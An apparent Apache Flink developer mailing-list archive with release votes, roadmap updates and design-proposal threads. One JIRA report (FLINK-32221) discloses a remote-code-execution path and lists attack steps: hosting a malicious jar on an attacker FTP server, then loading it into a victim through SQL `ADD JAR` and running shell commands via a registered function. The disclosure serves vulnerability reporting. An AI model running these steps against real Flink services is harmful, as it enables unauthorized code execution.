>>> - check the web PR
>>> 
>>> Best regards,
>>> Jing
>>> 
>>> 
>>> On Sun, May 28, 2023 at 4:00 PM Benchao Li  wrote:
>>> 
 Thanks Martijn,
 
 - checked signature/checksum [OK]
 - downloaded src, compiled from source [OK]
 - diffed src and tag, no binary files [OK]
 - gone through nexus staging area, looks good [OK]
 - run with flink 1.17.1 [OK]
 
 One thing I spotted is that the version in `docs/data/jdbc.yml` is still
 3.1.0; I'm not sure whether this should be a blocker.
 
 
 On Thu, May 25, 2023 at 02:55 Martijn Visser  wrote:
 
> Hi everyone,
> Please review and vote on the release candidate #1 for the version
>>> 3.1.1,
> as follows:
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> 
> The complete staging area is available for your review, which
>> includes:
> * JIRA release notes [1],
> * the official Apache source release to be deployed to
>> dist.apache.org
> [2],
> which are signed with the key with fingerprint
> A5F3BCE4CBE993573EC5966A65321B8382B219AF [3],
> * all artifacts to be deployed to the Maven Central Repository [4],
> * source code tag v3.1.1-rc1 [5],
> * website pull request listing the new release [6].
> 
> The vote will be open for at least 72 hours. It is adopted by
>> majority
> approval, with at least 3 PMC affirmative votes.
> 
> Thanks,
> Release Manager
> 
> [1]
> 
> 
 
>>> 
>> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522&version=12353281
> [2]
> 
 
>>> 
>> https://dist.apache.org/repos/dist/dev/flink/flink-connector-jdbc-3.1.1-rc1
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4]
> 
>>> https://repository.apache.org/content/repositories/orgapacheflink-1636/
> [5]
 https://github.com/apache/flink-connector-jdbc/releases/tag/v3.1.1-rc1
> [6] https://github.com/apache/flink-web/pull/654
> 
 
 
 --
 
 Best,
 Benchao Li
 
>>> 
>> 



Release 2.0 Status Updates - 05/31/2023

2023-05-31 Thread Xintong Song
Hi devs,

The release managers had some online discussions recently, and I'd like to
post the summary here for transparency.

We'd like to have 3 separate discussion tracks, so that each track can be
more focused.

   - Jark will help drive a discussion on the project's long-term roadmap.
   Concrete target of this discussion includes generating an updated version
   of the project roadmap[1], as well as a mechanism for regularly discussing
   and updating the roadmap.
   - Becket will help drive a discussion on the API compatibility,
   including the compatibility between 1.x and 2.0, as well as the general
   compatibility semantics. We are aware of the previous approved process
   (FLIP-197[2]). However, API compatibility across major releases and the
   process for deprecating / removing APIs seem not covered.
   - Martijn and Xintong will work on collecting work items for the 2.0
   release.
  - The items should be categorized into 2 kinds, must-have and
  nice-to-have.
  - We have created a wiki page[3] for collecting proposals, where we
  have already put some items based on previous discussions. *Please
  fill the chart with your proposals by June 15.*
  - After collecting the proposals, we'll organize further discussions
  to decide a minimum set of must-have items with the community.

Further plans such as how to manage the branches and whether to apply the
milestone release approach would depend on the outcome of the above
discussions.

Best,

Xintong (On behalf of the release management team)


[1] https://flink.apache.org/roadmap/

[2]
https://cwiki.apache.org/confluence/display/FLINK/FLIP-197%3A+API+stability+graduation+process

[3] https://cwiki.apache.org/confluence/display/FLINK/2.0+Release


Re: [DISCUSS] FLIP-287: Extend Sink#InitContext to expose ExecutionConfig and JobID

2023-05-31 Thread João Boto
If there are no more questions, I will start the voting thread tomorrow.
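
For reference, a minimal sketch of the proposed InitContext additions (my reading
of the FLIP; exact signatures may differ in the final version):

```
public interface InitContext {
    // ... existing methods ...

    /** Gives the sink writer access to the job's ExecutionConfig. */
    ExecutionConfig getExecutionConfig();

    /** The ID of the job the sink writer belongs to. */
    JobID getJobId();
}
```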

On 2023/01/13 14:15:04 Joao Boto wrote:
> Hi flink devs,
> 
> I'd like to start a discussion thread for FLIP-287[1].
> This comes from an offline discussion with @Lijie Wang, from FLIP-239[2]
> especially for the sink[3].
> 
> Basically to expose the ExecutionConfig and JobId on SinkV2#InitContext.
> This  changes are necessary to correct migrate the current sinks to SinkV2
> like JdbcSink, KafkaTableSink and so on, that relies on RuntimeContext
> 
> Comments are welcome!
> Thanks,
> 
> [1]
> https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=240880853
> [2]
> https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=217386271
> [3] https://issues.apache.org/jira/browse/FLINK-25421
> 


[jira] [Created] (FLINK-32221) Attacker can achieve Remote Code Execution when they can control Flink SQL script content

2023-05-31 Thread gaoyu shi (Jira)
gaoyu shi created FLINK-32221:
-

 Summary: Attacker can achieve Remote Code Execution when they can 
control Flink SQL script content 
 Key: FLINK-32221
 URL: https://issues.apache.org/jira/browse/FLINK-32221
 Project: Flink
  Issue Type: Bug
 Environment: all version that support SQL Script.
Reporter: gaoyu shi
 Attachments: image-2023-05-31-14-58-21-800.png, 
image-2023-05-31-14-59-50-875.png

Flink SQL scripts have similar syntax to traditional SQL, which means they also 
suffer from SQL injection vulnerabilities. 

An attacker can achieve Remote Code Execution when they can control part or whole 
of the Flink SQL script content via the following steps.

1. The attacker develops an evil custom scalar function class and packages it into 
a jar.

(see attached screenshot image-2023-05-31-14-59-50-875.png)

2. Run an FTP server on the attacker's host, and put the evil jar on it.

 
{code:java}
// install python-ftp-server tool
pip install python-ftp-server
// run ftp server
python3 -m python_ftp_server -d . --ip  -p password
// copy evil jar to current directory
cp  .{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the 
attacker can control part or whole of the Flink SQL script through SQL 
injection or other methods.

 

 
{code:java}
// transfer the evil jar from attacker host to victim
ADD JAR 'ftp://user:password@:6/evil.jar';
// register the evil function into the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
// run any bash command 
SELECT EVIL(''); {code}
 

 

In summary, this vulnerability allows an attacker to get remote code execution 
through a Flink SQL script. After looking at several websites that use Flink, it 
is very common to concatenate user input into Flink SQL statements, or even 
directly allow users to enter arbitrary Flink SQL scripts to process data. 

I accept that it is not a vulnerability to execute malicious code through 
Flink's web interface by submitting a malicious jar package, because developers 
will hide Flink's web interface by default, for example by only listening on 
localhost. However, malicious code execution through Flink SQL scripts is 
completely different. Currently, there is no hardening method or default 
configuration that can prevent attackers from using Flink SQL to achieve 
arbitrary code execution.

Suggestion:

The 'ADD JAR' command should not be able to load remote jars, or at least this 
should be disabled by default.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-309: Enable operators to trigger checkpoints dynamically

2023-05-31 Thread Dong Lin
Hi Piotr,

Thanks for the reply. Please see my comments inline.

On Wed, May 31, 2023 at 12:58 AM Piotr Nowojski 
wrote:

> Hi Dong,
>
> First of all we don't need to send any extra signal from source (or non
> source) operators. All of the operators are already reporting backpressured
> metrics [1]
> and all of the metrics are already sent to JobManager. We would only need
>

Hmm... I am not sure metrics such as isBackPressured are already sent to
the JM. According to the docs,
this metric is only available on the TaskManager. And I couldn't find the code
that sends these metrics to the JM. Can you help provide a link to the code and
doc that shows this metric is reported to the JM?

Supposing this metric is indeed reported to the JM, we also need to confirm that
the frequency meets our needs. For example, metrics are typically updated on
the order of seconds. The default metric reporter interval (as specified in
MetricOptions) is 10 seconds, which is probably not sufficient for the
suggested approach to work reliably. This is because the longer the
interval, the more likely it is that the algorithm will not trigger checkpoints
at the short interval even when all subtasks are not backpressured.

For example, let's say every source operator subtask reports this metric to
JM once every 10 seconds. There are 100 source subtasks. And each subtask
is backpressured roughly 10% of the total time due to traffic spikes (and
limited buffer). Then at any given time, there is a 1 - 0.9^100 ≈ 99.997%
chance that there is at least one subtask that is backpressured. Then we
have to wait for at least 10 seconds to check again. The expected
checkpointing interval can be very close to 30 minutes in the use-case
mentioned earlier.

> to pass some accessor to the metrics to the `CheckpointTrigger`.


> > execution.checkpointing.interval.no-backpressure
>
> Maybe that's the way to go, but as I mentioned before, I could see this
> `CheckpointTrigger` to be a pluggable component, that could have been
> configured
> the same way as `MetricReporters` are right now [2]. We could just provide
> out of the box two plugins, one implementing current checkpoint triggering
> strategy,
> and the other using backpressure.
>

Yes, it is possible to add a CheckpointTrigger as a pluggable component. I
am open to this idea as long as it provides benefits over the job-level
config (e.g. it covers more use-cases, or offers simpler configuration for the
common case).
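
Purely as an illustration, one possible shape for the pluggable trigger discussed
here (neither this interface nor MetricsAccessor exists in Flink today; the names
are mine):

```
import java.time.Duration;

public interface CheckpointTrigger {
    /**
     * Invoked periodically by the checkpoint coordinator. Implementations can
     * inspect metrics (e.g. backpressure) and return the delay until the next
     * checkpoint should be triggered.
     */
    Duration nextCheckpointDelay(MetricsAccessor metrics); // MetricsAccessor is hypothetical
}
```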

I think we can decide how to let users specify this interval after we are
able to address the other issues related to the feasibility and reliability
of the suggested approach.


> > I think the root cause of this issue is that the decision of the
> > checkpointing interval really depends on the expected impact of a
> > checkpoint on the throughput.
>
> Yes, I agree. Ideally we probably should adjust the checkpointing interval
> based on measured latency, for example using latency markers [3], but that
> would
> require some investigation if latency markers are indeed that costly as
> documented and if so optimizing them to solve the performance degradation
> of enabling
> e2e latency tracking.


> However, given that the new back pressure monitoring strategy would be
> optional AND users could implement their own `CheckpointTrigger` if really
> needed
> AND I have a feeling that there might be an even better solution (more
> about that later).
>

Overall I guess you are suggesting that 1) we can optimize the overhead of
latency tracking so that we can always turn it on and 2) we can use the
measured latency to dynamically determine checkpointing interval.

I can understand this intuition. Still, the devil is in the details. After
thinking more about this, I am not sure I can find a good way to make it
work. I am happy to discuss pros/cons if you provide more concrete
solutions.

Note that the goals of the alternative approach include 1) supporting sources
other than HybridSource and 2) reducing the checkpointing interval when the job
is backpressured. These goals are not necessary to achieve the use-case
targeted by FLIP-309. While it will be nice to support additional use-cases
with one proposal, it is probably also reasonable to make incremental
progress and support the low-hanging-fruit use-case first. The choice
really depends on the complexity and the importance of supporting the extra
use-cases.

I am hoping that we can still be open to using the approach proposed in
FLIP-309 in case we cannot make the alternative approach work. What do you
think?


> > if the checkpointing overhead is
> > close to none, then it is beneficial to the e2e latency to still
> checkpoint
> > a high frequency even if there exists (intermittent) backpressure.
>
> In that case users could just configure a slow checkpointing interval to a
> lower value, or just use static checkpoint interval strategy.
>

I guess the point is that the suggested approach, which dynamically
determines the 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Hi yuxia,

Thanks for your input. The `AlterDatabaseEvent` extends
`DatabaseModificationEvent`, which has the original database.
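
A minimal sketch of that shape (method names here are my assumptions; see the
FLIP for the final definitions):

```
public interface DatabaseModificationEvent extends CatalogModificationEvent {
    /** The database as it was before the modification. */
    CatalogDatabase database();
}

public interface AlterDatabaseEvent extends DatabaseModificationEvent {
    /** The new definition produced by ALTER DATABASE. */
    CatalogDatabase newDatabase();
}
```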

Best,
Shammon FY

On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:

> Thanks Shammon for driving it.
> The FLIP generally looks good to me. I only have one question.
> WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> the new CatalogDatabase after modification. Is it enough to only pass the origin
> database name? Would it be better to contain the origin CatalogDatabase so
> that the listener has a way to know what changed?
>
> Best regards,
> Yuxia
>
> - Original Message -
> From: "ron9 liu" 
> To: "dev" 
> Sent: Wednesday, May 31, 2023 11:36:04 AM
> Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi, Shammon
>
> Thanks for driving this FLIP. It will enhance the Flink metadata capability
> from the platform producer's perspective. The overall design looks good to me;
> I just have some small questions:
> 1. Regarding the CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass a Context as its parameter instead of two
> specific Objects. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL;
> what should we do in this case?
>
> Best,
> Ron
>
> On Wed, May 31, 2023 at 08:53 Shammon FY  wrote:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only DDL information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop tables and alter tables cannot be rolled back, and Flink cannot
> > handle these exceptions for the listener. It will cause the operation to
> > exit if an exception is thrown, but the executed DDL will be successful.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this Flip, [Support Customized Job Meta Data
> Listener]
> > > will  make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have a small question:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage, this FLIP focuses on metadata and lineage will be discussed
> in
> > > > another FLIP in the future. In this FLIP we want to add a customized
> > > > listener in Flink to report catalog modifications to external
> metadata
> > > > systems such as datahub[2] or atlas[3]. Users can view the specific
> > > > information of connectors such as source and sink for Flink jobs in
> > these
> > > > systems, including fields, watermarks, partitions, etc.
> > > >
> > > > Looking forward to hearing from you, thanks.
> > > >
> > > >
> > > > [1]
> > > >
> > > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-294%3A+Support+Customized+Job+Meta+Data+Listener
> > > > [2] 

Re: [DISCUSS] FLIP-313 Add support of User Defined AsyncTableFunction

2023-05-31 Thread Aitozi
Hi Jing,
What do you think about it? Can we move this feature forward?
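
To make the intended usage concrete, below is a minimal sketch. AsyncTableFunction
itself is existing API; registering a user-defined one and calling it directly via
LATERAL TABLE is what this FLIP enables. AsyncHttpClient is a made-up stand-in for
any async-capable client.

```
import java.util.Collection;
import java.util.Collections;
import java.util.concurrent.CompletableFuture;
import org.apache.flink.table.functions.AsyncTableFunction;
import org.apache.flink.types.Row;

public class AsyncHttpLookup extends AsyncTableFunction<Row> {

    /** Made-up async client interface, standing in for any async-capable client. */
    public interface AsyncHttpClient {
        CompletableFuture<String> get(String key);
    }

    private transient AsyncHttpClient client; // would be initialized in open()

    public void eval(CompletableFuture<Collection<Row>> result, String key) {
        // Fire the async call and complete the future from the client's callback.
        client.get(key).thenAccept(
                resp -> result.complete(Collections.singleton(Row.of(key, resp))));
    }
}

// tEnv.createTemporarySystemFunction("http_lookup", AsyncHttpLookup.class);
// SELECT t.id, r.resp FROM t, LATERAL TABLE(http_lookup(t.id)) AS r(id, resp);
```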

Thanks,
Aitozi.

Aitozi wrote on Mon, May 29, 2023 at 09:56:

> Hi Jing,
> > "Do you mean to support the AyncTableFunction beyond the
> LookupTableSource?"
> Yes, I mean to support the AyncTableFunction beyond the LookupTableSource.
>
> The "AsyncTableFunction" is the function with ability to be executed async
> (with AsyncWaitOperator).
> The async lookup join is a one of usage of this. So, we don't have to bind
> the AyncTableFunction with LookupTableSource.
> If User-defined AsyncTableFunction is supported, user can directly use
> lateral table syntax to perform async operation.
>
> > "It would be better if you could elaborate the proposed changes wrt the
> CorrelatedCodeGenerator with more details"
>
> In the proposal, we use the lateral table syntax to support the async table
> function. So the planner will translate this statement into a
> CommonExecCorrelate node, and the runtime code should be generated in
> CorrelatedCodeGenerator.
> In CorrelatedCodeGenerator, we know whether the table function's kind is
> `FunctionKind.TABLE` or `FunctionKind.ASYNC_TABLE`.
> For `FunctionKind.ASYNC_TABLE` we can generate an AsyncWaitOperator to
> execute the async table function.
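
For context, a minimal sketch of what an end user could then write, assuming
the FLIP lets an AsyncTableFunction be registered like any other UDF (class,
function, and registration names here are illustrative, not the final API):

    import java.util.Collection;
    import java.util.Collections;
    import java.util.concurrent.CompletableFuture;
    import org.apache.flink.table.functions.AsyncTableFunction;
    import org.apache.flink.types.Row;

    // eval() hands the request off and completes the future later, so the
    // planner can run it inside an AsyncWaitOperator instead of blocking
    // a task thread.
    public class AsyncRemoteLookup extends AsyncTableFunction<Row> {

        public void eval(CompletableFuture<Collection<Row>> result, String key) {
            CompletableFuture
                .supplyAsync(() -> lookupExternally(key)) // stand-in for a real async client
                .thenAccept(v -> result.complete(Collections.singletonList(Row.of(key, v))));
        }

        private String lookupExternally(String key) {
            return "value-of-" + key; // stubbed external call
        }
    }

    -- and then, via the lateral table syntax:
    -- SELECT t.id, r.v FROM t, LATERAL TABLE(async_remote_lookup(t.id)) AS r(k, v)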
>
>
> Thanks,
> Aitozi.
>
>
> Jing Ge wrote on Mon, May 29, 2023 at 03:22:
>
>> Hi Aitozi,
>>
>> Thanks for the clarification. The naming "Lookup" might suggest using it
>> for table lookup. But conceptually what the eval() method will do is to
>> get a collection of results (Row, RowData) from the given keys. How it will
>> be done depends on the implementation, i.e. you can implement your own
>> Source[1][2]. The example in the FLIP should be able to be handled in this
>> way.
>>
>> Do you mean to support the AsyncTableFunction beyond the LookupTableSource?
>> It would be better if you could elaborate the proposed changes wrt the
>> CorrelatedCodeGenerator with more details. Thanks!
>>
>> Best regards,
>> Jing
>>
>> [1]
>>
>> https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-table/flink-table-common/src/main/java/org/apache/flink/table/connector/source/LookupTableSource.java#L64
>> [2]
>>
>> https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-table/flink-table-common/src/main/java/org/apache/flink/table/connector/source/AsyncTableFunctionProvider.java#L49
>>
>> On Sat, May 27, 2023 at 9:48 AM Aitozi  wrote:
>>
>> > Hi Jing,
>> > Thanks for your response. As stated in the FLIP, the purpose of this
>> > FLIP is to support
>> > user-defined async table functions. As described in the Flink documentation [1]
>> >
>> > Async table functions are special functions for table sources that
>> perform
>> > > a lookup.
>> > >
>> >
>> > So end users cannot directly define and use async table functions now. A
>> > user case is reported in [2]
>> >
>> > So, in conclusion, no new interface is introduced, but we extend the
>> > ability to support user-defined async table functions.
>> >
>> > [1]:
>> >
>> >
>> https://nightlies.apache.org/flink/flink-docs-release-1.17/docs/dev/table/functions/udfs/
>> > [2]: https://lists.apache.org/thread/qljwd40v5ntz6733cwcdr8s4z97b343b
>> >
>> > Thanks.
>> > Aitozi.
>> >
>> >
>> > Jing Ge wrote on Sat, May 27, 2023 at 06:40:
>> >
>> > > Hi Aitozi,
>> > >
>> > > Thanks for your proposal. I am not quite sure if I understood your
>> > thoughts
>> > > correctly. You described a special-case implementation of the
>> > > AsyncTableFunction with no public API changes. Would you please
>> elaborate
>> > > your purpose of writing a FLIP according to the FLIP documentation[1]?
>> > > Thanks!
>> > >
>> > > [1]
>> > >
>> > >
>> >
>> https://cwiki.apache.org/confluence/display/FLINK/Flink+Improvement+Proposals
>> > >
>> > > Best regards,
>> > > Jing
>> > >
>> > > On Wed, May 24, 2023 at 1:07 PM Aitozi  wrote:
>> > >
>> > > > May I ask for some feedback  :D
>> > > >
>> > > > Thanks,
>> > > > Aitozi
>> > > >
>> > > > Aitozi wrote on Tue, May 23, 2023 at 19:14:
>> > > > >
>> > > > > Just caught a user case report from Giannis Polyzos for this
>> usage:
>> > > > >
>> > > > > https://lists.apache.org/thread/qljwd40v5ntz6733cwcdr8s4z97b343b
>> > > > >
>> > > > > > Aitozi wrote on Tue, May 23, 2023 at 17:45:
>> > > > > >
>> > > > > > Hi guys,
>> > > > > > I want to bring up a discussion about adding support of User
>> > > > > > Defined AsyncTableFunction in Flink.
>> > > > > > Currently, async table functions are special functions for
>> > > > > > table sources to perform async lookup. However, it's worth
>> > > > > > supporting user-defined async table functions, because the end
>> > > > > > SQL user can leverage them to perform async operations, which
>> > > > > > is useful to maximize system throughput, especially in
>> > > > > > IO-bottlenecked cases.
>> > > > > >
>> > > > > > You can find some more detail in [1].
>> > > > > >
>> > > > > > Looking forward to feedback
>> > > > > >
>> > > > > >
>> > > > 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Hi ron,

Thanks for your feedback.

> 1. Regarding the CatalogModificationListenerFactory#createListener method, I
think it would be better to pass a Context as its parameter instead of two
specific Objects. In this way, we can easily extend it in the future and
there will be no compatibility problems.

Sounds good to me. I will add a Context to
CatalogModificationListenerFactory, thanks.
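
For illustration, the factory could then look roughly like this, mirroring
DynamicTableFactory.Context (the accessor names are my assumption, not the
final interface):

    import org.apache.flink.configuration.Configuration;

    public interface CatalogModificationListenerFactory {

        CatalogModificationListener createListener(Context context);

        // Bundles what a listener may need at creation time; new accessors
        // can be added later without breaking existing implementations.
        interface Context {
            Configuration getConfiguration();
            ClassLoader getUserClassLoader();
        }
    }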

> 2. In FLIP, you mentioned that multiple Flink tables may refer to the
same physical table, so does the Listener report this physical table
repeatedly?

Yes, the listeners for different jobs may receive the same physical table;
users should check and update the table information based on the
identifier. For example, users may create tables on the same Kafka topic in
different jobs, which will notify listeners for the same Kafka topic.
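
For example, a listener could deduplicate on the identifier before pushing to
the external system (sketch only; the event type and its identifier accessor
are assumptions, not settled API):

    import java.util.Set;
    import java.util.concurrent.ConcurrentHashMap;
    import org.apache.flink.table.catalog.ObjectIdentifier;

    public class DedupingListener implements CatalogModificationListener {

        private final Set<ObjectIdentifier> reported = ConcurrentHashMap.newKeySet();

        @Override
        public void onEvent(CatalogModificationEvent event) {
            // Report each table identifier at most once per listener instance.
            if (event instanceof CreateTableEvent
                    && reported.add(((CreateTableEvent) event).identifier())) {
                reportToMetadataSystem(event);
            }
        }

        private void reportToMetadataSystem(CatalogModificationEvent event) {
            // push to DataHub / Atlas / ...
        }
    }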

> 3. When registering a Listener object, will it connect to an external
system such as Datahub? If the Listener object registration times out due
to permission issues, it will affect the execution of all subsequent SQL,
what should we do in this case?

Users should establish connections to external systems when creating a
listener as needed, and they should handle the exceptions there too. If
creating a listener fails with an exception, Flink will propagate the
exception and fail as well.
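
In other words, connection setup lives entirely in user code and fails fast;
roughly (MetadataClient is a hypothetical stand-in for a DataHub or Atlas
client, and the listener interface is assumed to have a single onEvent method):

    public CatalogModificationListener createListener(Context context) {
        // May block and time out; any exception propagates so that Flink
        // fails visibly instead of silently running without the listener.
        MetadataClient client = MetadataClient.connect(
            context.getConfiguration().getString("listener.endpoint", "http://localhost:8080"));
        return event -> client.report(event);
    }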

Best,
Shammon FY

On Wed, May 31, 2023 at 11:36 AM liu ron  wrote:

> Hi, Shammon
>
> Thanks for driving this FLIP. It will enhance Flink's metadata capability
> from the platform producer's perspective. The overall design looks good to me,
> I just have some small questions:
> 1. Regarding the CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass a Context as its parameter instead of two
> specific Objects. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL;
> what should we do in this case?
>
> Best,
> Ron
>
> Shammon FY wrote on Wed, May 31, 2023 at 08:53:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only DDL information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop table and alter table cannot be rolled back, so Flink cannot
> > handle these exceptions for the listener. The operation will exit if an
> > exception is thrown, but the executed DDL will still have succeeded.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > specific operations executed first?  If I want to perform DDL permission
> > verification (such as integrating with Ranger based on the listener), is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this FLIP, [Support Customized Job Meta Data
> Listener]
> > > will make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have some small questions:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification (such as integrating with Ranger based on the listener),
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage; this FLIP focuses on metadata, and lineage will be discussed
> in
> 

[jira] [Created] (FLINK-32220) Improving the adaptive local hash agg code to avoid get value from RowData repeatedly

2023-05-31 Thread dalongliu (Jira)
dalongliu created FLINK-32220:
-

 Summary: Improving the adaptive local hash agg code to avoid get value from RowData repeatedly
 Key: FLINK-32220
 URL: https://issues.apache.org/jira/browse/FLINK-32220
 Project: Flink
  Issue Type: Improvement
  Components: Table SQL / Runtime
Affects Versions: 1.17.0
Reporter: dalongliu
 Fix For: 1.18.0

--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-315: Support Operator Fusion Codegen for Flink SQL

2023-05-31 Thread liu ron
Hi, Jingsong

Thanks for your valuable suggestions.

Best,
Ron

Jingsong Li wrote on Tue, May 30, 2023 at 13:22:

> Thanks Ron for your information.
>
> I suggest that it be written in the Motivation section of the FLIP.
>
> Best,
> Jingsong
>
> On Tue, May 30, 2023 at 9:57 AM liu ron  wrote:
> >
> > Hi, Jingsong
> >
> > Thanks for your review. We have tested it on the TPC-DS benchmark and got a 12%
> > gain overall when supporting only the Calc operator. In
> > some queries we even got more than a 30% gain, so it looks like an effective
> > approach.
> >
> > Best,
> > Ron
> >
> > Jingsong Li wrote on Mon, May 29, 2023 at 14:33:
> >
> > > Thanks Ron for the proposal.
> > >
> > > Do you have some benchmark results for the performance improvement? I
> > > am more concerned about the improvement on Flink than the data in
> > > other papers.
> > >
> > > Best,
> > > Jingsong
> > >
> > > On Mon, May 29, 2023 at 2:16 PM liu ron  wrote:
> > > >
> > > > Hi, dev
> > > >
> > > > I'd like to start a discussion about FLIP-315: Support Operator
> Fusion
> > > > Codegen for Flink SQL[1]
> > > >
> > > > As main memory grows, query performance is more and more determined
> > > > by the raw CPU costs of query processing itself. This is because query
> > > > processing techniques based on interpreted execution show poor
> > > > performance on modern CPUs, due to lack of locality and frequent
> > > > instruction mis-prediction. Therefore, the industry is also researching
> > > > how to improve engine performance by increasing operator execution
> > > > efficiency. In addition, while optimizing Flink's performance for
> > > > TPC-DS queries, we found that a significant amount of CPU time was
> > > > spent on virtual function calls, framework collector calls, and
> > > > invalid calculations, which can be optimized away to improve overall
> > > > engine performance. After some investigation, we found that Operator
> > > > Fusion Codegen, proposed by Thomas Neumann in the paper [2], can
> > > > address these problems. I have finished a PoC [3] to verify its
> > > > feasibility and validity.
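
Conceptually, fusion replaces the per-record hops between operators with one
generated tight loop. A hand-written stand-in for what the codegen might emit
for a fused Filter + Calc pair (purely illustrative, not the PoC's output):

    import java.util.List;
    import org.apache.flink.table.data.GenericRowData;
    import org.apache.flink.table.data.RowData;

    public final class FusedFilterCalc {
        // Interpreted execution routes every record through the virtual
        // processElement/collect calls of two separate operators; the fused
        // version does the same work in a single loop with no dispatch.
        static void process(List<RowData> input, List<RowData> out) {
            for (RowData r : input) {
                long v = r.getLong(0);                 // read the field once
                if (v > 10) {                          // fused filter
                    out.add(GenericRowData.of(v * 2)); // fused projection
                }
            }
        }
    }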
> > > >
> > > > Looking forward to your feedback.
> > > >
> > > > [1]:
> > > >
> > >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-315+Support+Operator+Fusion+Codegen+for+Flink+SQL
> > > > [2]: http://www.vldb.org/pvldb/vol4/p539-neumann.pdf
> > > > [3]: https://github.com/lsyldliu/flink/tree/OFCG
> > > >
> > > > Best,
> > > > Ron
> > >
>


Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Thanks Shammon for driving it. 
The FLIP generally looks good to me. I only have one question.
WRT AlterDatabaseEvent, IIUC, it'll contain the original database name and the
new CatalogDatabase after modification. Is it enough to only pass the original
database name? Would it be better to also contain the original CatalogDatabase
so that listeners have a way to know what changed?
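
For example, the event could carry both versions so a listener can diff them
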